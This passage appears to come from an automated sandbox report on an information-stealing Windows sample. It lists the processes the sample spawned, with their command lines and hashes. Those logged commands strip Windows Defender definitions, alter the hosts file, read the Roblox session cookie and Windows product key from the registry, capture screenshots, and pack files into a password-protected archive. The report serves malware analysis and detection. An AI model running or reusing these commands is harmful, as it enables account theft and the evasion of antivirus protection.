AAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:34
Start time:22:16:03
Start date:15/09/2023
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff667630000
File size:100'352 bytes
MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:35
Start time:22:16:03
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:36
Start time:22:16:03
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:37
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:39
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                    Imagebase:0x7ff6483a0000
                                                                                                                                                                    File size:455'656 bytes
                                                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                    Imagebase:0x7ff609bc0000
                                                                                                                                                                    File size:21'504 bytes
                                                                                                                                                                    MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:43
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:44
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
                                                                                                                                                                    Imagebase:0x7ff7084b0000
                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:45
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:46
                                                                                                                                                                    Start time:22:16:04
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                    Imagebase:0x7ff609bc0000
File size: 21'504 bytes
MD5 hash: FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 47
Start time: 22:16:04
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 48
Start time: 22:16:04
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 49
Start time: 22:16:04
Start date: 15/09/2023
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff667630000
File size: 100'352 bytes
MD5 hash: B12E0F9C42075B4B7AD01D0B6A48485D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 50
Start time: 22:16:04
Start date: 15/09/2023
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
Imagebase: 0x7ff7a7bb0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 51
Start time: 22:16:05
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 52
Start time: 22:16:05
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 53
Start time: 22:16:05
Start date: 15/09/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff6afba0000
File size: 447'488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low
Has exited: true

Target ID: 54
Start time: 22:16:07
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 55
Start time: 22:16:07
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 56
Start time: 22:16:07
Start date: 15/09/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff6afba0000
File size: 447'488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low
Has exited: true

Target ID: 57
Start time: 22:16:12
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 58
Start time: 22:16:12
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 59
Start time: 22:16:12
Start date: 15/09/2023
Path: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
Imagebase: 0x7ff6ee730000
File size: 630'736 bytes
MD5 hash: 9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:60
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:61
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:62
                                                                                                                                                                    Start time:22:16:13
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic os get Caption
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:63
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:64
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:65
                                                                                                                                                                    Start time:22:16:14
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:66
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:67
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:68
                                                                                                                                                                    Start time:22:16:15
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:69
                                                                                                                                                                    Start time:22:16:16
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 70
Start time: 22:16:16
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 71
Start time: 22:16:16
Start date: 15/09/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase: 0x7ff6afba0000
File size: 447'488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low
Has exited: true

Target ID: 72
Start time: 22:16:16
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 73
Start time: 22:16:16
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 74
Start time: 22:16:17
Start date: 15/09/2023
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff6a2030000
File size: 521'728 bytes
MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 75
Start time: 22:16:17
Start date: 15/09/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase: 0x7ff7a8120000
File size: 273'920 bytes
MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 76
Start time: 22:16:17
Start date: 15/09/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bab10000
File size: 625'664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 77
Start time: 22:16:17
Start date: 15/09/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase: 0x7ff6afba0000
File size: 447'488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
